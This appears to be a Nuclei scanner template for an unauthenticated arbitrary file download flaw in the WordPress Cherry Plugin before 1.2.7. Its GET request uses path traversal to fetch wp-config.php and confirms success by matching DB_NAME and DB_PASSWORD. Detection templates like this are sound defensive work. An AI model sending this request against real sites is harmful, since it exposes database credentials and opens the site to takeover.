30 lines
990 B
YAML
30 lines
990 B
YAML
|
id: cherry-file-download
|
||
|
|
||
|
info:
|
||
|
name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
|
||
|
author: 0x_Akoko
|
||
|
severity: high
|
||
|
description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
|
||
|
- https://github.com/CherryFramework/cherry-plugin
|
||
|
tags: wordpress,wp-plugin,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "DB_NAME"
|
||
|
- "DB_PASSWORD"
|
||
|
part: body
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|